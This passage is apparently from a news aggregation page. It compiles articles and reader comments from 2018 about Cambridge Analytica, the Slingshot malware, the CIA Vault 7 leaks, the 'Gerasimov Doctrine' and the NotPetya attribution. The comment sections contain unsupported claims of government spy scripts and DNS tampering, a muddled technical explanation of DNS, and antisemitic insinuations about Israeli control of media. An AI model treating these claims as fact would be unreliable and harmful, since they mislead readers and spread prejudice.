Despite its prominence in research on well-being, Kosinski's work, Cadwalladr points out, drew a great deal of interest from British and American intelligence agencies and defense contractors, including overtures from the private company running an intelligence project nicknamed "Operation KitKat" because a correlation had been found between anti-Israeli sentiments and liking Nikes and KitKats. Several of Kosinski's co-authored papers list the US government's Defense Advanced Research Projects Agency, or DARPA, as a funding source. His résumé boasts of meetings with senior figures at two of the world's largest defense contractors, Boeing and Microsoft, both companies that have sponsored his research. He ran a workshop on digital footprints and psychological assessment for the Singaporean Ministry of Defense.

For his part, Aleksandr Kogan established a company, Global Science Research, that contracted with SCL, using Facebook data to map personality traits for its work in elections (Kosinski claims that Kogan essentially reverse-engineered the app that he and Stillwell had developed). Kogan's app harvested data on Facebook users who agreed to take a personality test for the purposes of academic research (though it was, in fact, to be used by SCL for non-academic ends). But according to Wylie, the app also collected data on their entire -- and nonconsenting -- network of friends. Once Cambridge Analytica and SCL had won contracts with the State Department and were pitching to the Pentagon, Wylie became alarmed that this illegally-obtained data had ended up at the heart of government, along with the contractors who might abuse it.

This apparently bizarre intersection of research on topics like love and kindness with defense and intelligence interests is not, in fact, particularly unusual. It is typical of the kind of dual-use research that has shaped the field of social psychology in the US since World War II.

Much of the classic, foundational research on personality, conformity, obedience, group polarization, and other such determinants of social dynamics -- while ostensibly civilian -- was funded during the cold war by the military and the CIA. The cold war was an ideological battle, so, naturally, research on techniques for controlling belief was considered a national security priority. This psychological research laid the groundwork for propaganda wars and for experiments in individual "mind control."

The pioneering figures from this era -- for example, Gordon Allport on personality and Solomon Asch on belief conformity -- are still cited in NATO psy-ops literature to this day .."

Craig H. , , March 24, 2018 at 3:42 pm

This is an issue which has frustrated me greatly. In spite of the fact that the country's leading psychologist (at the very least one of them -- ex-APA president Seligman) has been documented taking consulting fees from Guantanamo and Black Sites goon squads, my social science pals refuse to recognize any corruption at the core of their so-called replicated quantitative research.

I have asked more than five people to point at the best critical work on the Big 5 Personality theory and they all have told me some variant of "it is the only way to get consistent numbers". Not one has ever retreated one step or been receptive to the suggestion that this might indicate some fallacy in trying to assign numbers to these properties.

They eat their own dog food all the way and they seem to be suffering from a terrible malnutrition. At least the anthropologists have Price . (Most of that book can be read for free in installments at Counterpunch.)

[Mar 23, 2018] Was Destructive 'Slingshot' Malware Deployed by the Pentagon

The rule No.1: do not buy cheap routers. Do not use routers which are supplied for free by your ISP. Buy only from proven companies with good security record. To use your own firewall (a small linux server is OK) is a must in the current circumstances
There is no special value in Kaspersky anti-virus software. all such products can be used as a backdoor in your computer (for example via update mechanism). Using complex and opaque software actually makes Windows less secure not more secure. Periodic (say, daily) reinstallation from trusted image is probably a better way, especially if Windows is really minimized and does not contain third party software that has it's own update mechanisms or such mechanism are blocked.
But attacks on routers is a new fashion and should be taken very seriously as most people pay no attention to this crucial part of their business or home network. In any case a separate firmware is needed after Internet router which now is not that expensive (a decent box can be bought for around $300. For those who know Unix/Linux see for example Firewall Micro Appliance or QOTOM (both can be used of pfSense or your custom Linux solution) For those who don't see, for example, Zyxel [USG40] ZyWALL (USG) UTM Firewall
Notable quotes:
"... Further findings suggest that Slingshot had common code with only two other known pieces of software, both malwares, which were attributed to the NSA and CIA, respectively, by analysts. Though various U.S. agencies are all denying comment, things are clearly pointing uncomfortably in their direction. ..."
"... Malware is not a precision munition, it hits wide targets and spreads out to bystanders. This is particularly disturbing to note if, as some reports are indicating, this malware was Pentagon in origin. ..."
Mar 23, 2018 | www.theamericanconservative.com
Slingshot . The malware targeted Latvian-made Internet routers popular in the Middle East, Africa, and Southeast Asia.

Kaspersky's reports reveal that the malware had been active since at least 2012, and speculates that it was government-made, owing to its sophistication and its use of novel techniques rarely seen elsewhere.

Those investigating the matter further have drawn the conclusion that Slingshot was developed by the U.S. government, with some reports quoting former officials as connecting it to the Pentagon's JSOC special forces. For those following the cyber security and malware sphere, this is a huge revelation, putting the U.S. government in the hot seat for deploying cyber attacks that harm a much greater range of innocent users beyond their intended targets.

Kaspersky's own findings note that the code was written in English, using a driver flaw to allow the implanting of various types of spyware. Among those mentioned by Moscow-based Kaspersky was an implant named "GOLLUM," which notably was mentioned in one of the leaked Edward Snowden documents .

Further findings suggest that Slingshot had common code with only two other known pieces of software, both malwares, which were attributed to the NSA and CIA, respectively, by analysts. Though various U.S. agencies are all denying comment, things are clearly pointing uncomfortably in their direction.

Cyberscoop , one of the first news outlets to break the story, reported a mixed reaction among officials. Some noted that Kaspersky Labs was simply doing what a security company is supposed to do. Others, however, were less agreeable, suggesting it was an intentional attempt by Kaspersky to undermine U.S. security.

The argument, as far as it goes, is that given the ostensible target areas -- the Middle East, North Africa, Afghanistan -- Kaspersky should have concluded it was related to the War on Terror and sat on their findings. The Trump administration already views Kaspersky as a sort of hostile actor -- banning the use of Kaspersky products by any government or civilian federal contractor in December, citing Kremlin influence (a charge that has been vehemently denied by the company). This just gives them more justification for seeing Kaspersky as an adversary in the space.

Unfortunately for the Russian company, some American retailers have even followed suit, pulling the software from the shelves on the grounds that it's Russian, and that therefore suspect.

There has been no clear evidence that Kaspersky's software was serving as a backdoor for Russian intelligence, though it was reported last fall that sensitive documents were stolen from a National Security Agency (NSA) contractor's laptop via its Kaspersky-made antivirus software . In a statement at the time, the company said, "Kaspersky Lab has never helped, nor will help, any government in the world with its cyberespionage efforts." Turns out that Israeli spies, spying on the Russian spies, disclosed the intrusion to U.S. officials.

Kaspersky has consistently ranked near the top of antivirus ratings from virtually all third-party reviewers. The company has sold its products to nearly 400 million users worldwide, with 60 percent in the U.S. and Western Europe. Until now, Kaspersky was being used by several major agencies in the federal government, including the State Department and Department of Defense.

Ironically, this new Slingshot issue itself appears just to be a testament to how well the company's security works at digging up extremely dangerous malware. It also underscores the uneasy reality that the U.S. has been engaging in its own brand of cyber warfare all along.

Any claims that a specific piece of U.S. malware -- in this case, Slingshot -- was targeting only al-Qaeda or ISIS bad guys is disingenuous as well. The exploit on routers is hitting an entire region, infecting an untold number of innocent people . Internet cafés are said to have been hit in this, meaning everyone going into the cafes is at risk.

Malware is not a precision munition, it hits wide targets and spreads out to bystanders. This is particularly disturbing to note if, as some reports are indicating, this malware was Pentagon in origin.

U.S. civilian government surveillance is already doing great harm to general Internet security, and does so by remaining in denial about the balance of good to harm that is being done. The U.S. military, by contrast, has shown its willingness to inflict major harm on innocents in pursuit of any war goal. As they start hitting regions with malware, all bets are off on how far it will spread.

Security companies like Kaspersky Labs only afford the private user limited protection from all of this malware, because they're constantly playing catch-up, finding new variants and new exploits that the various pieces of software are using. Slingshot, for instance, went undetected for six solid years .

The discovery means fixes can finally be implemented for the routers and the computers. Novel exploits like this are rarely a one-time fix, however, as a slew of similar exploits from other sources tend to crop up after one gets taken out. It's a never-ending battle.

In August, President Trump made U.S. Cyber Command a formal military command , reflecting the growing view of the Internet as a military objective. Much as America's other battlefields result in collateral damage on the ground, the cyberwar is going to have a deleterious impact on day-to-day life in cyberspace. The big questions are how bad things will get, and how quickly.

Jason Ditz is news editor at Antiwar.com , a nonprofit organization dedicated to the cause of non-interventionism. In addition to TAC, his work has appeared in Forbes, Toronto Star, Minneapolis Star-Tribune, Providence Journal, Daily Caller, Washington Times and Detroit Free Press.

[Mar 21, 2018] Never attribute to malice that which can be attributed to a bug in the software

Mar 21, 2018 | consortiumnews.com

JWalters , March 19, 2018 at 10:46 pm

In a casual conversation at a party a computer science researcher from a leading university commented that the vast majority of "denial of service" attacks in this country are done by the federal government. That would probably be the CIA covert ops in service to the bankster oligarchy. The Israelis are also known to have cyber warfare capabilities, and are a central part of the oligarchy, judging by their clear control of the MSM.

It makes complete sense that the oligarchy would do everything it could to harass and slow down the opposition, even if just to frustrate them to the point of giving up. I'm glad you are reporting your experiences here; it will help the site administrators deal with the problem.

A few years ago there was a Zionist mole(s) at Disqus who deleted posts that were too informative about Israel, especially those with links to highly informative articles. After an open discussion of the problem it eventually disappeared.

backwardsevolution , March 19, 2018 at 4:29 pm

Realist -- occasionally this happens to me and, yes, it is most frustrating. What I am doing more often now (but sometimes I still forget) is copying my text before hitting "Post Comment". If it disappears, at least you still have it and can try again. If this occurs, I go completely off the site, and then come back on and post again. Does this just happen on posts that took you a long time to get finished? I ask this because I've found that if I type some words, go away and start making dinner (or whatever), and my comment is not posted for several hours, then sometimes it does this.

I sure hope you get it figured out because your posts are always wonderful to read.

Realist , March 19, 2018 at 4:47 pm

This has been happening systematically to anything I post today. Both long and short entries. I copy the text, then post it. When I see it appear or even see it under moderation, I have assumed it would stand and so delete the copy rather than save it -- that space goes to the next composition. So, everything "disappeared" today is gone. Most of the stuff disappeared has to do with our supposed rights of free speech and the intrusion of the intelligence agencies into our lives and our liberties. Guess who I suspect of sabotaging these calls to be vigilant against attacks on our freedoms? Good gravy, they are becoming relentless in trying to control every jot and tittle of the narrative. The entire MSM is not enough for them, even web sites with a microscopic audience are now in their sights. I don't know what else to make of a problem that has become routine, not just sporadic.

backwardsevolution , March 19, 2018 at 6:18 pm

You're just too good, Realist! You make too much sense! If there is a "they" out there who are censoring, of course they'd go after someone like you. Take a break, kick back, then see what happens tomorrow. If it continues, then maybe you could make a few calls.

Skip Scott , March 19, 2018 at 7:29 pm

Sorry to hear of your difficulties, Realist. Don't give up yet. Your posts are a very valuable part of this website. I do suspect outside interference. This site and ICH are both under attack, and probably others as well. I hope Nat and Tom Feeley can afford some good techies to mount a good defense.

robjira , March 19, 2018 at 9:58 pm

I agree with be and Skip, Realist. The same thing happened to me (and I'm not even a frequent commentator here); sometimes it takes days for a post(s) to appear. This sometime can be triggered by multiple links, extensive text formatting, etc. (you probably already know all this).

Anyway, be has it right; take a breather for a while. If something more nefarious is really happening, wear it like a medal; if your comments are disappeared, that as good as confirms you're on target. Your commentary is really insightful, and nothing freaks them out more than an informed opinion.
Peace.

Paul E. Merrell, J.D. , March 19, 2018 at 9:59 pm

To paraphrase someone: "Never attribute to malice that which can be attributed to a bug in the software."

backwardsevolution , March 19, 2018 at 10:15 pm

Paul E. Merrell -- "Never attribute to malice that which can be attributed to a bug in the software."

Quite true. I was having trouble going on Paul Craig Roberts' site for about a month (and another site, but I can't remember which one). I said to my son, "What the heck? Are they shutting down access to this site?" My son came onto my computer and within about two minutes he had me set right again. He said it had to do with my Internet security company. Who knew? Certainly not me! Thank goodness for tech-literate children.

Litchfield , March 20, 2018 at 9:09 am

" even web sites with a microscopic audience are now in their sights."

Maybe "microscopic," but with the potential to be magnified and multiplied. I have been puzzled as to why some posts have shown up as being in moderation and others not. But have not systematically followed up to see what happened. I assume comments at this site are moderated in some way, but why would that result in the patchy appearance of an actual "under moderation" signal?

freedom lover , March 20, 2018 at 3:39 pm

Not just this website but very common if you try to post anything on RT.

Sam F , March 19, 2018 at 8:47 pm

I also noticed several comments here that had been deleted after I refreshed the screen. They appeared to have attracted the "anti-semitism" accusation, so perhaps other hackers are involved.

Sam F , March 19, 2018 at 8:40 pm

While at first skeptical of the hacking hypothesis, I realized its similarity to what I have seen for two months on RT.

RT is apparently being copied to "mirror sites" likely controlled by US agencies, so that they can run spy scripts when the stories are viewed. My PC runs far slower after checking any story on RT, and the browser must be restarted to regain normal speed. No other website has this problem, and certainly RT would not want to annoy their viewers by doing that themselves.

Most likely the secret agency scripts are sending files and browsing information to government spies.

It may be that CN is now being copied into hacked "mirror sites" by those who control the web DNS service that identifies the web server address for named websites. That would be a US secret agency. I have wondered whether such agencies are responsible for the trolls who have annoyed commenters here for several months. It may be that they are controlling the commentary now as well, to make political dossiers.

Litchfield , March 20, 2018 at 9:12 am

"My PC runs far slower after checking any story on RT, and the browser must be restarted to regain normal speed. "

I have noticed this as well. I don't check RT all that often, but one time I wanted to see what Peter Lavelle had been up to lately with CrossTalk, so went to RT. This was awhile ago so I can't recall the exact details, but I think my browser generally froze up and I had to reboot my laptop. Of course it made me a bit paranoid and I wondered what was going on at RT.

Realist , March 20, 2018 at 5:01 pm

I've often noticed a great delay in RT loading. I'll have to focus on the effect you described. Sometimes I get a "service not available" notice for CN which usually resolves within no more than a half hour.

Inthebyte , March 20, 2018 at 11:27 am

I agree about RT. When I log on there everything slows to a crawl, or flat doesn't navigate. Thanks for the comment. Now I know I'm being gas lighted. Another site with all of these problems is Information Clearing House who are hacked repeatedly.

Zachary Smith , March 20, 2018 at 12:51 pm

My PC runs far slower after checking any story on RT, and the browser must be restarted to regain normal speed. No other website has this problem, and certainly RT would not want to annoy their viewers by doing that themselves.

I'm running three script-blocker addons as I type this, and a fourth will be enabled again after making this post. The latter one does something to the CN site, and unless disabled any comment goes to the bottom of the page. My Firefox browser (which I'm using now) has the cache set to "0", and also to "never remember history". This slows it somewhat, but I figure the trade-off is worthwhile.

I review four "Russian" sites and have noticed they're chock-full of annoying ads and scripts. One of them I suspect is being run for income, for there is no coherent "message" along with most of the headlines being clickbait material. But I return there because sometimes they have a story worth more investigation.

Sam F , March 19, 2018 at 8:42 pm

While at first skeptical of the hacking hypothesis, I should note what I have seen for two months on RT.

RT is apparently being copied to "mirror sites" likely controlled by US agencies, so that they can run spy scripts when the stories are viewed. My PC runs far slower after checking any story on RT, and the browser must be restarted to regain normal speed. No other website has this problem, and certainly RT would not want to annoy their viewers by doing that themselves.

Most likely the secret agency scripts are sending files and browsing information to government spies.

It may be that CN is now being copied into hacked "mirror sites" by those who control the web DNS service that identifies the web server address for named websites. That would be a US secret agency. I have wondered whether such agencies are responsible for the trolls who have annoyed commenters here for several months. It may be that they are controlling the commentary now as well, to make political dossiers.

geeyp , March 20, 2018 at 12:28 am

Nothing much secret regarding the secret agencies. Didn't I read that Google and Face. (same company with Y.T.) have fairly recently hired 10,000 new employees for just this purpose? I ,too, have had plenty of issues with the RT.com site. It is not RT causing the issues. Truth hurts these evil P.O.S. And, also I have wondered regarding the ISP involvement. On the article topic, I was quite angered when I read his Tweet over the weekend; that punk has got nerve and needs to wear an orange jumpsuit.

Litchfield , March 20, 2018 at 9:13 am

What is the ISP movement?

Sam F , March 20, 2018 at 11:50 am

The ISP may or may not be involved, but the DNS is involved in creating fake (or real) "mirror sites." DNS (distributed name service) has its own servers all over, which translate text URLs (xxx.com ) to numeric internet (IP) addresses. So when you request the site, your local DNS server gives you the address based upon its updates from other sources, including the "mirror" sites used for heavily-used websites.

I do not yet know the processes used to update DNS servers which would be tampered to create fake mirror sites, or exactly how this would be controlled, except that secret agencies would know this and would have such control. Others might be able to do this as well.

Skeptigal , March 20, 2018 at 4:26 am

Sorry, I know you're frustrated but I couldn't help but giggle at your indignant replies. They are hilarious. Your comments may have ended up in the spam folder. If you contact them they will restore your comments. Good luck! :)

Realist , March 20, 2018 at 11:23 pm

Using the British standard, I'm going to assume you are responsible for all the trouble unless you prove otherwise.

[Mar 15, 2018] Julian Assange The CIA director is waging war on truth-tellers like WikiLeaks

Notable quotes:
"... All this speech to stifle speech comes in reaction to the first publication in the start of WikiLeaks' "Vault 7" series. Vault 7 has begun publishing evidence of remarkable CIA incompetence and other shortcomings. This includes the agency's creation, at a cost of billions of taxpayer dollars, of an entire arsenal of cyber viruses and hacking programs -- over which it promptly lost control and then tried to cover up the loss. These publications also revealed the CIA's efforts to infect the public's ubiquitous consumer products and automobiles with computer viruses. ..."
"... President Theodore Roosevelt understood the danger of giving in to those "foolish or traitorous persons who endeavor to make it a crime to tell the truth about the Administration when the Administration is guilty of incompetence or other shortcomings." Such "endeavor is itself a crime against the nation," Roosevelt wrote. President Trump and his officials should heed that advice ..."
Mar 15, 2018 | www.washingtonpost.com

Julian Assange is editor of WikiLeaks.

Mike Pompeo, in his first speech as director of the CIA, chose to declare war on free speech rather than on the United States' actual adversaries. He went after WikiLeaks, where I serve as editor, as a "non-state hostile intelligence service." In Pompeo's worldview, telling the truth about the administration can be a crime -- as Attorney General Jeff Sessions quickly underscored when he described my arrest as a "priority." News organizations reported that federal prosecutors are weighing whether to bring charges against members of WikiLeaks, possibly including conspiracy, theft of government property and violating the Espionage Act.

All this speech to stifle speech comes in reaction to the first publication in the start of WikiLeaks' "Vault 7" series. Vault 7 has begun publishing evidence of remarkable CIA incompetence and other shortcomings. This includes the agency's creation, at a cost of billions of taxpayer dollars, of an entire arsenal of cyber viruses and hacking programs -- over which it promptly lost control and then tried to cover up the loss. These publications also revealed the CIA's efforts to infect the public's ubiquitous consumer products and automobiles with computer viruses.

When the director of the CIA, an unelected public servant, publicly demonizes a publisher such as WikiLeaks as a "fraud," "coward" and "enemy," it puts all journalists on notice, or should. Pompeo's next talking point, unsupported by fact, that WikiLeaks is a "non-state hostile intelligence service," is a dagger aimed at Americans' constitutional right to receive honest information about their government. This accusation mirrors attempts throughout history by bureaucrats seeking, and failing, to criminalize speech that reveals their own failings.

President Theodore Roosevelt understood the danger of giving in to those "foolish or traitorous persons who endeavor to make it a crime to tell the truth about the Administration when the Administration is guilty of incompetence or other shortcomings." Such "endeavor is itself a crime against the nation," Roosevelt wrote. President Trump and his officials should heed that advice .

[Mar 08, 2018] A key piece of evidence pointing to 'Guccifer 2.0' being a fake personality created by the conspirators in their attempt to disguise the fact that the materials from the DNC published by 'WikiLeaks' were obtained by a leak rather than a hack had to do with the involvement of the former GCHQ person Matt Tait.

Highly recommended!
Notable quotes:
"... What has however become clear in recent days is that the 'Gerasimov Doctrine' was not invented by its supposed author, but by a British academic, Mark Galeotti, who has now confessed – although in a way clearly designed to maintain as much of the 'narrative' as possible. ..."
"... Three days ago, an article by Galleoti appeared in 'Foreign Policy' entitled 'I'm Sorry for Creating the "Gerasimov Doctrine": I was the first to write about Russia's infamous high-tech military strategy. One small problem: it doesn't exist.' ..."
"... The translation of the original article by Gerasimov with annotations by Galeotti which provoked the whole hysteria turns out to be a classic example of what I am inclined to term 'bad Straussianism.' ..."
"... What Strauss would have called the 'exoteric' meaning of the article quite clearly has to do with defensive strategies aimed at combatting the kind of Western 'régime change' projects about which people like those who write for 'Lawfare' are so enthusiastic. But Galeotti tells us that this is, at least partially, a cover for an 'esoteric' meaning, which has to do with offensive actions in Ukraine and similar places. ..."
Mar 08, 2018 | turcopolier.typepad.com

David Habakkuk , 08 March 2018 at 10:28 AM

PT and all,

More material on the British end of the conspiracy.

Commenting on an earlier piece by PT, I suggested that a key piece of evidence pointing to 'Guccifer 2.0' being a fake personality created by the conspirators in their attempt to disguise the fact that the materials from the DNC published by 'WikiLeaks' were obtained by a leak rather than a hack had to do with the involvement of the former GCHQ person Matt Tait.

(See http://turcopolier.typepad.com/sic_semper_tyrannis/2018/02/pieces-of-the-coup-puzzle-fall-into-place-by-publius-tacitus.html .)

To recapitulate: Back in June 2016, hard on the heels of the claim by Dmitri Alperovitch of 'CrowdStrike' to have identified clinching evidence making the GRU prime suspects, Tait announced that, although initially unconvinced, he had found a 'smoking gun' in the 'metadata' of the documents released by 'Guccifer 2.0.'

A key part of this was the use by someone modifying a document of 'Felix Edmundovich' – the name and patronymic of Dzerzhinsky, the Lithuanian-Polish noble who created the Soviet secret police.

As I noted, Tait was generally identified as a former GCHQ employee who now ran a consultancy called 'Capital Alpha Security.' However, checking Companies House records revealed that he had filed 'dormant accounts' for the company. So it looks as though the company was simply a 'front', designed to fool 'useful idiots' into believing he was an objective analyst.

As I also noted in those comments, Tait writes the 'Lawfare' blog, one of whose founders, Benjamin Wittes, looks as though he may himself have been involved in the conspiracy up to the hilt. Furthermore, a secure income now appears to have been provided to replace that from the non-existent consultancy, in the shape of a position at the 'Robert S. Strauss Center for International Security and Law', run by Robert Chesney, a co-founder with Wittes of 'Lawfare.'

A crucial part of the story, however, is that the notion of GRU responsibility for the supposed 'hacks' appears to be part of a wider 'narrative' about the supposed 'Gerasimov Doctrine.' From the 'View from Langley' provided to Bret Stephens by CIA Director Mike Pompeo at the 'Aspen Security Forum' last July:

'I hearken back to something called the Gerasimov doctrine from the early 70s, he's now the head of the – I'm a Cold War guy, forgive me if I mention Soviet Union. He's now the head of the Russian army and his idea was that you can win wars without firing a single shot or with firing very few shots in ways that are decidedly not militaristic, and that's what's happened. What changes is the costs; to effectuate change through cyber and through RT and Sputnik, their news outlets, and through other soft means; has just really been lowered, right. It used to be it was expensive to run an ad on a television station now you simply go online and propagate your message. And so they have they have found an effective tool, an easy way to go reach into our systems, and into our culture to achieve the outcomes they are looking for.'

(See https://aspensecurityforum.org/wp-content/uploads/2017/07/The-View-from-Langley.pdf .)

What has however become clear in recent days is that the 'Gerasimov Doctrine' was not invented by its supposed author, but by a British academic, Mark Galeotti, who has now confessed – although in a way clearly designed to maintain as much of the 'narrative' as possible.

Three days ago, an article by Galleoti appeared in 'Foreign Policy' entitled 'I'm Sorry for Creating the "Gerasimov Doctrine": I was the first to write about Russia's infamous high-tech military strategy. One small problem: it doesn't exist.'

(See http://foreignpolicy.com/2018/03/05/im-sorry-for-creating-the-gerasimov-doctrine/ .)

A key paragraph:

'Gerasimov was actually talking about how the Kremlin understands what happened in the "Arab Spring" uprisings, the "color revolutions" against pro-Moscow regimes in Russia's neighborhood, and in due course Ukraine's "Maidan" revolt. The Russians honestly – however wrongly – believe that these were not genuine protests against brutal and corrupt governments, but regime changes orchestrated in Washington, or rather, Langley. This wasn't a "doctrine" as the Russians understand it, for future adventures abroad: Gerasimov was trying to work out how to fight, not promote, such uprisings at home.'

The translation of the original article by Gerasimov with annotations by Galeotti which provoked the whole hysteria turns out to be a classic example of what I am inclined to term 'bad Straussianism.'

(See https://inmoscowsshadows.wordpress.com/2014/07/06/the-gerasimov-doctrine-and-russian-non-linear-war/ .)

What Strauss would have called the 'exoteric' meaning of the article quite clearly has to do with defensive strategies aimed at combatting the kind of Western 'régime change' projects about which people like those who write for 'Lawfare' are so enthusiastic. But Galeotti tells us that this is, at least partially, a cover for an 'esoteric' meaning, which has to do with offensive actions in Ukraine and similar places.

Having now read the text of the article, I can see a peculiar irony in it. In a section entitled 'You Can't Generate Ideas On Command', Gerasimov suggests that 'The state of Russian military science today cannot be compared with the flowering of military-theoretical thought in our country on the eve of World War II.'

According to the 'exoteric' meaning of the article, it is not possible to blame anyone in particular for this situation. But Gerasimov goes on on to remark that, while at the time of that flowering there were 'no people with higher degrees' or 'academic schools or departments', there were 'extraordinary personalities with brilliant ideas', who he terms 'fanatics in the best sense of the word.'

Again, Galeotti discounts the suggestion that nobody is to blame, assuming an 'esoteric meaning', and remarking: 'Ouch. Who is he slapping here?'

Actually, Gerasimov refers by name to two, utterly different figures, who certainly were 'extraordinarily personalities with brilliant ideas.'

If Pompeo had even the highly amateurish grasp of the history of debates among Soviet military theorists that I have managed to acquire he would be aware that one of the things which was actually happening in the 'Seventies was the rediscovery of the ideas of Alexander Svechin.

Confirming my sense that this has continued on, Gerasimov ends by using Svechin to point up an intractable problem: it can be extraordinarily difficult to anticipate the conditions of a war, and crucial not to impose a standardised template likely to be inappropriate, but one has to make some kinds of prediction in order to plan.

Immediately after the passage which Galeotti interprets as a dig at some colleague, Gerasimov elaborates his reference to 'extraordinary people with brilliant ideas' by referring to an anticipation of a future war, which proved prescient, from a very different figure to Svechin:

'People like, for instance, Georgy Isserson, who, despite the views he formed in the prewar years, published the book "New Forms Of Combat." In it, this Soviet military theoretician predicted: "War in general is not declared. It simply begins with already developed military forces. Mobilization and concentration is not part of the period after the onset of the state of war as was the case in 1914 but rather, unnoticed, proceeds long before that." The fate of this "prophet of the Fatherland" unfolded tragically. Our country paid in great quantities of blood for not listening to the conclusions of this professor of the General Staff Academy.'

Unlike Svechin, whom I have read, I was unfamiliar with Isserson. A quick Google search, however, unearthed a mass of material in American sources – including, by good fortune, an online text of a 2010 study by Dr Richard Harrison entitled 'Architect of Soviet Victory in World War II: The Life and Theories of G.S. Isserson', and a presentation summarising the volume.

Ironically, Svechin and Isserson were on opposite sides of fundamental divides. So the former, an ethnic Russian from Odessa, was one of the 'genstabisty', the former Tsarist General Staff officers who sided with the Bolsheviks and played a critical role in teaching the Red Army how to fight. Meanwhile Isserson was a very different product of the 'borderlands' – the son of a Jewish doctor, brought up in Kaunas, with a German Jewish mother from what was then Königsberg, giving him an easy facility with German-language sources.

The originator of the crucial concept of 'operational' art – the notion that in modern industrial war, the ability to handle a level intermediate between strategy and tactics was critical to success – was actually Svechin.

Developing the ambivalence of Clausewitz, however, he stressed that both the offensive and the defensive had their places, and that the key to success was to know which was appropriate when and also to be able rapidly to change from one to the other. His genuflections to Marxist-Leninist dogma, moreover, were not such as to take in any of Dzerzhinsky's people.

By contrast, Isserson was unambiguously committed to the offensive strand in the Clausewitzian tradition, and a Bolshevik 'true believer' (although he married the daughter of a dispossessed ethnically Russian merchant, who had their daughter baptised without his knowledge.)

As Harrison brings out, Isserson's working through of the problems of offensive 'operational art' would be critical to the eventual success of the Red Army against Hitler. However, the specific text to which he refers was, ironically, a warning of precisely one of the problems implicit in the single-minded reliance on the offensive: the possibility that one could be left with no good options confronting an antagonist similarly oriented – as turned out to be the case.

As Gerasimov intimates, while unlike Svechin, executed in 1938, Isserson survived the Stalin years, he was another of the victims of Dzerzhinsky's heirs. Arrested shortly before his warnings were vindicated by the German attack on 22 June 1941, he would spend the war in the Gulag and only return to normal life after Stalin's death.

So I think that the actual text of Gerasimov's article reinforces a point I have made previously. The 'evidence' identified by Tait is indeed a 'smoking gun.' But it emphatically does not point towards the GRU.

Meanwhile, another moral of the tale is that Americans really should stop being taken in by charlatan Brits like Galeotti, Tait, and Steele.

[Mar 07, 2018] By the end of 2016, the CIA's hacking division, which formally falls under the agency's Center for Cyber Intelligence (CCI), had over 5000 registered users and had produced more than a thousand hacking systems, trojans, viruses, and other "weaponized" malware.

Mar 07, 2018 | www.thegatewaypundit.com

Paul Tibbets a day ago

Brennan is a scum bag, he over saw the CIA as they sought to become the premier Gov. Agency.

https://wikileaks.org/ciav7p1/

Since 2001 the CIA has gained political and budgetary preeminence over the U.S. National Security Agency (NSA). The CIA found itself building not just its now infamous drone fleet, but a very different type of covert, globe-spanning force -- its own substantial fleet of hackers. The agency's hacking division freed it from having to disclose its often controversial operations to the NSA (its primary bureaucratic rival) in order to draw on the NSA's hacking capacities.

By the end of 2016, the CIA's hacking division, which formally falls under the agency's Center for Cyber Intelligence (CCI), had over 5000 registered users and had produced more than a thousand hacking systems, trojans, viruses, and other "weaponized" malware. Such is the scale of the CIA's undertaking that by 2016, its hackers had utilized more code than that used to run Facebook. The CIA had created, in effect, its "own NSA" with even less accountability and without publicly answering the question as to whether such a massive budgetary spend on duplicating the capacities of a rival agency could be justified.

[Feb 20, 2018] US-UK Accuse Russia of "NotPetya" Cyberattack, Offer Zero Evidence Global Research - Centre for Research on Globalization

Notable quotes:
"... The US and European press have both published stories accusing the Russian government, and in particular, the Russian military, of the so-called "NotPetya" cyberattack which targeted information technology infrastructure in Ukraine. ..."
"... Ulson Gunnar is a New York-based geopolitical analyst and writer especially for the online magazine " New Eastern Outlook ". ..."
"... All images in this article are from the author. ..."
Feb 20, 2018 | www.globalresearch.ca

US-UK Accuse Russia of "NotPetya" Cyberattack, Offer Zero Evidence By Ulson Gunnar Global Research, February 19, 2018 Region: Europe , Russia and FSU , USA Theme: Intelligence , Media Disinformation

The US and European press have both published stories accusing the Russian government, and in particular, the Russian military, of the so-called "NotPetya" cyberattack which targeted information technology infrastructure in Ukraine.

The Washington Post in an article titled, " UK blames Russian military for 'malicious' cyberattack ," would report:

Britain and the United States blamed the Russian government on Thursday for a cyberattack that hit businesses across Europe last year, with London accusing Moscow of "weaponizing information" in a new kind of warfare. Foreign Minister Tariq Ahmad said "the U.K. government judges that the Russian government, specifically the Russian military, was responsible for the destructive NotPetya cyberattack of June 2017." The fast-spreading outbreak of data-scrambling software centered on Ukraine, which is embroiled in a conflict with Moscow-backed separatists in the country's east. It spread to companies that do business with Ukraine, including U.S. pharmaceutical company Merck, Danish shipping firm A.P. Moller-Maersk and FedEx subsidiary TNT.

British state media, the BBC, would report in its article, " UK and US blame Russia for 'malicious' NotPetya cyber-attack ," that:

The Russian military was directly behind a "malicious" cyber-attack on Ukraine that spread globally last year, the US and Britain have said.

The BBC also added that:

On Thursday the UK government took the unusual step of publicly accusing the Russia military of being behind the attack. "The UK and its allies will not tolerate malicious cyber activity," the foreign office said in a statement. Later, the White House also pointed the finger at Russia.

Yet despite this "unusual step of publicly accusing the Russian military of being behind the attack," neither the US nor the British media provided the public with any evidence, at all, justifying the accusations. The official statement released by the British government would claim:

The UK's National Cyber Security Centre assesses that the Russian military was almost certainly responsible for the destructive NotPetya cyber-attack of June 2017. Given the high confidence assessment and the broader context, the UK government has made the judgement that the Russian government – the Kremlin – was responsible for this cyber-attack.

Claiming that the Russian military was "almost certainly responsible," is not the same as being certain the Russian military was responsible. And such phrases as "almost certainly" have been used in the past by the United States and its allies to launch baseless accusations ahead of what would otherwise be entirely unprovoked aggression against targeted states, in this case, Russia. The White House would also release a statement claiming:

In June 2017, the Russian military launched the most destructive and costly cyber-attack in history. The attack, dubbed "NotPetya," quickly spread worldwide, causing billions of dollars in damage across Europe, Asia, and the Americas. It was part of the Kremlin's ongoing effort to destabilize Ukraine and demonstrates ever more clearly Russia's involvement in the ongoing conflict. This was also a reckless and indiscriminate cyber-attack that will be met with international consequences.

Considering claims that this is the "most destructive and costly cyber-attack in history, " it would seem imperative to establish evidence beyond doubt of who was responsible. No Evidence From Governments Confirmed to Possess the Means to Fabricate Attribution Yet, so far, this has not been done. Claims that Russia's military was behind the attacks seems to be built solely upon private analysts who have suggested the attacks appear to have originated in Russia.

However, as it was revealed by Wikileaks in its Vault 7 release , exposing cyber hacking tools used by the US Central Intelligence Agency (CIA), the origin of attacks can be forged. USA Today in an article titled, " WikiLeaks: CIA hacking group 'UMBRAGE' stockpiled techniques from other hackers ," would admit:

